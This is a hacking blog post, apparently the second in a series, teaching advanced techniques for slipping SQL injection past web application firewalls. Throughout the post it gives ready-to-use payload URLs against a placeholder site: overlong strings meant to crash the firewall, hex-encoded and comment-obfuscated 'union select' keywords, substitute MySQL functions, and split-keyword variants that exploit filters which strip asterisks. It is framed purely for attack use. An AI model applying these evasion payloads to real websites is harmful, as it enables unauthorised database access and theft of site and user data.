Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!If you do not read my first post on BASIC WAF BYPASSING then read it here Basic Method1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
(( You can test if the WAF can be crashed by typing: ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get a 500, you can exploit it using the Buffer Overflow Method! )) 2) Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-Encoded) Values.Example:
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…. (which means “union select”)
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php3) Use other Variables or Commands instead of the common ones for SQLi: Apart from the “UNION SELECT” other commands might be blocked.Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDUgroup_concat() | concat_ws()4) Misc Exploitable Functions: Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):Example:
This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
(If the Firewall removes the “*”, the result will be: 15+union+select….) So, if you find such a silly function, you can exploit it, in this way! :-D
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
No comments:
Post a Comment